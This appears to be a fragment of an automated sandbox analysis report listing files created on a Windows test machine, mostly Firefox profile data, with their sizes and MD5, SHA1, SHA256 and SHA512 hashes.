SHA512235d4b1f8a9f18f8d562aee2a14f42482bca3505d75ef9e056d0f6a1f110ca21ff290a632cdd555a8bc43fb81628a18ce637b62c6e537c73ebdd55eb621d8191
-
Filesize
21KB
MD52392d606167d6f7a4e1778ec1301b4ba
SHA180a6f4ec948ed8945a9be074077c74fcb5ddbbb9
SHA256bf7c240913c2b5fa8e0d7f929df60ab9f9a1a039e89c98c7adc752f1e8fe91fd
SHA512e4b5ae163703ae231cd7a98817fb2dd53bfacc0b6aa51d97542e3d3ae8a552b6607a2130a260e3653cf27ea4684517f1501c2d428023f503c080d9557bf40916
-
Filesize
442KB
MD585430baed3398695717b0263807cf97c
SHA1fffbee923cea216f50fce5d54219a188a5100f41
SHA256a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA51206511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD547486a65c705223fb7bf6ba040c18532
SHA13f4bcc4ef3df7d813d4414014512ebadf7c14dfc
SHA256b86dec8e55f0e91bc352571d22bb1ecbeb566e1ad2eac71493f622a61f710855
SHA5124cda6b636d6851c5f8ce7317136638c18f822265223f31a0489ecbe6678d99a279e81ebc5277bf37b7ba09d4583ef059332f75fae564e61ade314f81a822297c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1009pdhg.default-release\datareporting\glean\db\data.safe.bin
Filesize2KB
MD5f1a267ef77cbc4771a607f7739414107
SHA13f673ad25c78237da5edf097534f0487df3cc6d6
SHA256952567cd5c035be84c7167f160ffc2b3cb802795c67a24926a9928226d5c7472
SHA512d937ae0a4c48fcd0fe60d41dba6b1a8dff7c8673efb1c30948f247bc1dac20f14dbb1ad2c79ce3dd640665d55c1080646bdaf20118117e9a8dc3be6926a29716
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1009pdhg.default-release\datareporting\glean\pending_pings\541ac863-be25-4a76-b47a-42d98545b087
Filesize10KB
MD53dc92fa5289914db225ec991475c9749
SHA15d48be233e41cac295583e424ce90a6087c58308
SHA256828a5c28d76298093fd00db87231389ce514128141fc948d459016dc3b7ec6eb
SHA512a1b1a2b6b0ac5b466c9f66f68d4e118d5b6bd3984856e74816123a41a3c579bf84d17a18a87e8b81f65e13d66e2ca05ae72dbaee6b9303bbcb51bcd84135e20d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1009pdhg.default-release\datareporting\glean\pending_pings\58f01c12-014b-425e-9c20-f3d8eef9378c
Filesize745B
MD5864e99be60a47d479faf5ebc31081243
SHA11639cbd1d91e1fb6d8277e065e64d5ebea75ee88
SHA25620073add2c8f6700abf87e6fe947bb64fdbe6b9bbc3fbd43c55953a22bb6eb6d
SHA512f3b5d44ad10216cd5784aaa24d74871d1ed37d31f5cba6b994bb052d95b6d4e6b0367424f79881540cce6123554aaa3eec9ab80deb9b8115bd65f5e8cf16bac4
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1009pdhg.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll
Filesize997KB
MD5fe3355639648c417e8307c6d051e3e37
SHA1f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA2561ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA5128f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1009pdhg.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info
Filesize116B
MD53d33cdc0b3d281e67dd52e14435dd04f
SHA14db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1
-
Filesize
7KB
MD596e2736c07bf1b1f219d773e902e9634
SHA17d342932e8fb7775b6f04d695170bd93e5b5777f
SHA256932cf8e74a0a1c693b3daa77904ee32873f7dcb5483cc8d778fa4b18ba578d7e
SHA512e73e6e35028f230f1cdbf4109b0895a187a3f9e4547c297524b7ebb91526326a1f171f01435c32fb9f29055f78d562e9e5d9ca60fa7c49aa5d37eb38def6295f
-
Filesize
6KB
MD56fad38ecd0c7e0f285153c1b614cef15
SHA154f4269be404d43b47ef7f2e4997032f4be1341b
SHA2561acec4d1b1457578340675d82242c084225dc2523813f83b7583eccefa12b8a1
SHA5128675708091052a1b6840f7be5dacb6698166c54b7c1b3997be627506a36fd25609756582a26469def4b0613d3b8b0d529730a25fede78bb7fa7b93fcfee27313
-
Filesize
6KB
MD515a96781c74df57c14f4dca8ed91857a
SHA1acac1b93a9ad311b203e1aa28532015d9200053a
SHA2564d46c611dfca09b6e79409846facb64787de0a545f5623420772cd8538ee16fb
SHA51281f1115e8ca670a8d7a47fc3cc2e6b8d906b5aa073fd0aed31600eb0bb401ec67bb72d430b732b6e51dd6f4e20dc0da5f80f32c38b8251f1afdab71b673e98d0
-
Filesize
6KB
MD52d6a407dda2b80d10f10d523dcb749c5
SHA1b4da50f0e12295cbd2b195fb9bfc546563d9c20a
SHA2565ffb405a6595b0232e96d034085abb33dbd946ab3a0248a86b085c6e6793b5d7
SHA512d2d8c311ed70f10a0f70f95233dac11dd04a7624788b0db2cd78b782396aef9129921ae9180b9b5cc74b85daf4027f6d3b801be9478f785f940a9f340b5c729f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1009pdhg.default-release\sessionstore-backups\recovery.jsonlz4
Filesize4KB
MD50eee1d3eccb33d1aec61df0fab21d243
SHA1d28937c604b4e6df9722902b073db09990ad2d25
SHA25687bcc68fbcac30327e3bb46242dfdb3c414e2c7f0410f45968e3efaea7ec5c34
SHA512ac12afac7b96ed1b0c4186fab7dd83d7c3665405e289a68770461d52fab1f4ca45f8e8368af9a0fe20bd42beb3aaf53ed4374993d73c0316add5f7238a35760d
-
Filesize
1.7MB
MD501c87832191e4ec3561802276e00a9da
SHA15d30e7bc1c0ca52ab683283ca93582f0e114f531
SHA2564c94e2b0301320774d531b2f10755adf18dd3c785d9b62c01a9edba42e869243
SHA512f8e2fb1a2696ad50a0a3cb2b22f576b75a2663304520ba0c91940f540b842d40776a3a73f657202dd74d191fed0bcf877e854852c9df7ac6ed6cb3a1aa465754
-
Filesize
2.0MB
MD520804890273fa0387262be080ed29b18
SHA1daa8c33e3bb0fd2e9e110e51add443e1c22cd1f3
SHA2565bdefb9f7366ddf3b5d7002cc9cee37ec0bbfddc76ea28d5d667e4563f3c92c0
SHA5121e871a66b28999f7e35fa226ad4b544f3b42b1385125c10ffa63533075761a6563b258be9bc5e7c4230a34366cb24945d313b45f0bdef3253c473309296cf149
-
Filesize
2.0MB
MD52341120afd619b888c8316c0a91d39b8
SHA1a20ac1ddd4110ea8a3e7732c8b49ab84df004ce7
SHA256c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b
SHA51289cefe006dbd385374fb4feee4b32b944bacee34ae160404ab3516ab12bded8c976699d76290fbc9dd911ba9bfa0c906b944a68d06baad25fc1529cc3a204d0b